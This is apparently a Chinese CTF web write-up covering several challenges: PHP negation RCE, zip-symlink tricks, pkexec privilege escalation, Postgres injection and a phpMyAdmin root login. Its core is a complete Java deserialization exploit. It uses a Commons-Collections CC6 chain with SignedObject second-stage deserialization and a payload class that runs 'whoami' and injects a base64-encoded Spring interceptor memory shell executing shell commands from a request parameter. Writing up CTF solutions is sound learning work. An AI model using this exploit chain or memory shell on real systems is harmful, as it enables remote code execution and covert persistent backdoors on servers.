Web
简单的PHP
PHP7 取反+无参RCE,把命令放在请求头里,然后取请求头的命令执行即可:
can_u_login
原题:https://www.cnblogs.com/zhengna/p/15917521.html
简单包含
脏数据绕过
压缩包
zip -y pwn.zip passwd.php
mkdir passwd.php
zip -y pwn.zip passwd.php/.jpg
构造特殊的压缩包。让他报错。就不会进入if。删文件。
高手高手高高手
diff源码发现这边双引号变单引号
1day改下
拿session
写文件
web有个二进制。ida
大致意思就是bocai.html没了就行
pkexec提权
有ia特殊属性。去掉之后rm -rf文件
然后执行下elf
Ez_Java
两个姿势。一个直接用依赖中自带的org.apache.xalan.xsltc.trax.TemplatesImpl绕过原生TemplatesImpl。直接打
第二个用二次反序列化绕过。黑名单过滤cc3.2的TiedMapEntry。用CC4.4的TiedMapEntry代替。
随便一个加载字节码的类
然后用CC6
123会当作参数传入transform
把123换成signobject对象即可变成参数传入InvokerTransformer的transform方法
然后input可控。修改this的属性。调用到SignedObject的getObject
进行二次反序列化。加载字节码
EXP:
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import javassist.ClassPool;
import javassist.NotFoundException;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.*;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections4.keyvalue.TiedMapEntry;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.security.*;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
import java.util.Set;
public class cc6 {
public static void setField(Object obj, String field, Object value) throws Exception {
Field f = obj.getClass().getDeclaredField(field);
f.setAccessible(true);
f.set(obj, value);
}
public static void main(String[] args) throws Exception {
byte[] bytes = ClassPool.getDefault().get(exp.class.getName()).toBytecode();
byte[][] bytecode = new byte[][]{bytes};
HashMap innermap = new HashMap();
TemplatesImpl templates = TemplatesImpl.class.newInstance();
setField(templates, "_bytecodes", bytecode);
setField(templates, "_name", "test");
setField(templates, "_class", null);
LazyMap map = (LazyMap) LazyMap.decorate(innermap, new FactoryTransformer(new InstantiateFactory(TrAXFilter.class, new Class[]{Templates.class}, new Object[]{templates})));
TiedMapEntry tiedmap = new TiedMapEntry(map, 123);
HashSet hashset = new HashSet(1);
hashset.add("foo");
Field field = Class.forName("java.util.HashSet").getDeclaredField("map");
field.setAccessible(true);
HashMap hashset_map = (HashMap) field.get(hashset);
Field table = Class.forName("java.util.HashMap").getDeclaredField("table");
table.setAccessible(true);
Object[] array = (Object[]) table.get(hashset_map);
Object node = array[0];
if (node == null) {
node = array[1];
}
Field key = node.getClass().getDeclaredField("key");
key.setAccessible(true);
key.set(node, tiedmap);
KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("DSA");
keyPairGenerator.initialize(1024);
KeyPair keyPair = keyPairGenerator.genKeyPair();
PrivateKey privateKey = keyPair.getPrivate();
Signature signature = Signature.getInstance(privateKey.getAlgorithm());
SignedObject signedObject = new SignedObject((Serializable)hashset, privateKey, signature);
InvokerTransformer i = new InvokerTransformer("getObject", null, null);
HashMap innermap1 = new HashMap();
LazyMap map2 = (LazyMap) LazyMap.decorate(innermap1, i);
TiedMapEntry tiedmap2 = new TiedMapEntry(map2, signedObject);
HashSet hashset2 = new HashSet(1);
hashset2.add("foo");
Field field2 = Class.forName("java.util.HashSet").getDeclaredField("map");
field2.setAccessible(true);
HashMap hashset_map2 = (HashMap) field2.get(hashset2);
Field table2 = Class.forName("java.util.HashMap").getDeclaredField("table");
table2.setAccessible(true);
Object[] array2 = (Object[]) table2.get(hashset_map2);
Object node2 = array2[0];
if (node2 == null) {
node2 = array2[1];
}
Field key2 = node2.getClass().getDeclaredField("key");
key.setAccessible(true);
key.set(node2, tiedmap2);
try {
ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("./cc6"));
outputStream.writeObject(hashset2);
outputStream.close();
ObjectInputStream inputStream = new ObjectInputStream(new FileInputStream("./cc6"));
inputStream.readObject();
} catch (Exception e) {
e.printStackTrace();
}
}
}
exp.java
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.springframework.util.Base64Utils;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.servlet.handler.AbstractHandlerMapping;
import java.io.IOException;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.ArrayList;
public class exp extends AbstractTranslet {
static {
try {
printName();
} catch (NoSuchFieldException e) {
e.printStackTrace();
} catch (ClassNotFoundException e) {
e.printStackTrace();
} catch (InvocationTargetException e) {
e.printStackTrace();
} catch (NoSuchMethodException e) {
e.printStackTrace();
} catch (IllegalAccessException e) {
e.printStackTrace();
} catch (InstantiationException e) {
e.printStackTrace();
} catch (IOException e) {
e.printStackTrace();
}
}
public static void printName() throws NoSuchMethodException, InvocationTargetException, IllegalAccessException, NoSuchFieldException, ClassNotFoundException, InstantiationException, IOException {
Runtime.getRuntime().exec("whoami");
String className = "GuokeController";
byte[] bytes = Base64Utils.decodeFromString("yv66vgAAADQAiAoAIABGCABHCwBIAEkLAEoASwgATAgATQoATgBPCgAMAFAIAFEKAAwAUgcAUwcAVAgAVQgAVgoACwBXCABYCABZBwBaCgALAFsKAFwAXQoAEgBeCABfCgASAGAKABIAYQoAEgBiCgASAGMKAGQAZQoAZABmCgBkAGMHAGcHAGgHAGkBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEUxHdW9rZUNvbnRyb2xsZXI7AQAJcHJlSGFuZGxlAQBkKExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0O0xqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZTtMamF2YS9sYW5nL09iamVjdDspWgEAAXABABpMamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyOwEABndyaXRlcgEAFUxqYXZhL2lvL1ByaW50V3JpdGVyOwEAAW8BABJMamF2YS9sYW5nL1N0cmluZzsBAAFjAQATTGphdmEvdXRpbC9TY2FubmVyOwEAB3JlcXVlc3QBACdMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdDsBAAhyZXNwb25zZQEAKExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZTsBAAdoYW5kbGVyAQASTGphdmEvbGFuZy9PYmplY3Q7AQAEY29kZQEADVN0YWNrTWFwVGFibGUHAFQHAGoHAFMHAFoHAGgHAGsHAGwHAG0HAGcBAApFeGNlcHRpb25zAQAKU291cmNlRmlsZQEAFEd1b2tlQ29udHJvbGxlci5qYXZhDAAhACIBAApndW9rZTEyMTM4BwBrDABuAG8HAGwMAHAAcQEAAAEAB29zLm5hbWUHAHIMAHMAbwwAdAB1AQADd2luDAB2AHcBABhqYXZhL2xhbmcvUHJvY2Vzc0J1aWxkZXIBABBqYXZhL2xhbmcvU3RyaW5nAQAHY21kLmV4ZQEAAi9jDAAhAHgBAAcvYmluL3NoAQACLWMBABFqYXZhL3V0aWwvU2Nhbm5lcgwAeQB6BwB7DAB8AH0MACEAfgEAAlxBDAB/AIAMAIEAggwAgwB1DACEACIHAGoMAIUAhgwAhwAiAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAD0d1b2tlQ29udHJvbGxlcgEAQW9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvaGFuZGxlci9IYW5kbGVySW50ZXJjZXB0b3JBZGFwdGVyAQATamF2YS9pby9QcmludFdyaXRlcgEAJWphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3QBACZqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZQEAEGphdmEvbGFuZy9PYmplY3QBAAxnZXRQYXJhbWV0ZXIBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEACWdldFdyaXRlcgEAFygpTGphdmEvaW8vUHJpbnRXcml0ZXI7AQAQamF2YS9sYW5nL1N5c3RlbQEAC2dldFByb3BlcnR5AQALdG9Mb3dlckNhc2UBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEACGNvbnRhaW5zAQAbKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylaAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgEABXN0YXJ0AQAVKClMamF2YS9sYW5nL1Byb2Nlc3M7AQARamF2YS9sYW5nL1Byb2Nlc3MBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQAMdXNlRGVsaW1pdGVyAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS91dGlsL1NjYW5uZXI7AQAHaGFzTmV4dAEAAygpWgEABG5leHQBAAVjbG9zZQEABXdyaXRlAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAFZmx1c2gAIQAfACAAAAAAAAIAAQAhACIAAQAjAAAALwABAAEAAAAFKrcAAbEAAAACACQAAAAGAAEAAAAFACUAAAAMAAEAAAAFACYAJwAAAAEAKAApAAIAIwAAAboABgAJAAAArysSArkAAwIAOgQZBMYAoSy5AAQBADoFEgU6BhIGuAAHtgAIEgm2AAqZACK7AAtZBr0ADFkDEg1TWQQSDlNZBRkEU7cADzoHpwAfuwALWQa9AAxZAxIQU1kEEhFTWQUZBFO3AA86B7sAElkZB7YAE7YAFLcAFRIWtgAXOggZCLYAGJkACxkItgAZpwAFGQY6BhkItgAaGQUZBrYAGxkFtgAcGQW2AB2nAAU6BQOsBKwAAQAPAKYAqQAeAAMAJAAAAEYAEQAAAAcACgAIAA8ACgAXAAsAGwANACsADgBKABAAZgASAHwAEwCQABQAlQAVAJwAFgChABcApgAZAKkAGACrABoArQAcACUAAABmAAoARwADACoAKwAHABcAjwAsAC0ABQAbAIsALgAvAAYAZgBAACoAKwAHAHwAKgAwADEACAAAAK8AJgAnAAAAAACvADIAMwABAAAArwA0ADUAAgAAAK8ANgA3AAMACgClADgALwAEADkAAAA5AAf+AEoHADoHADsHADr8ABsHADz8ACUHAD1BBwA6/wAaAAUHAD4HAD8HAEAHAEEHADoAAQcAQgEBAEMAAAAEAAEAHgABAEQAAAACAEU");
//控制器的bytecode
ClassLoader classLoader = Thread.currentThread().getClass().getClassLoader();
Method method = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
method.setAccessible(true);
method.invoke(classLoader, className, bytes, 0, bytes.length);
WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
AbstractHandlerMapping abstractHandlerMapping = (AbstractHandlerMapping) context.getBean("requestMappingHandlerMapping");
Field field = AbstractHandlerMapping.class.getDeclaredField("adaptedInterceptors");
field.setAccessible(true);
ArrayList<Object> adaptedInterceptors = (ArrayList<Object>) field.get(abstractHandlerMapping);
adaptedInterceptors.add(classLoader.loadClass(className).newInstance());
}
@Override
public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
}
@Override
public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
}
}
easygo
go.mod有github项目地址:https://github.com/KaanSK/golang-sqli-challenge/blob/main/main.go
没有过滤的postgresql注入。
sqlmap跑:
easy_sql
phpmyadmin
root@password登陆
直接看flag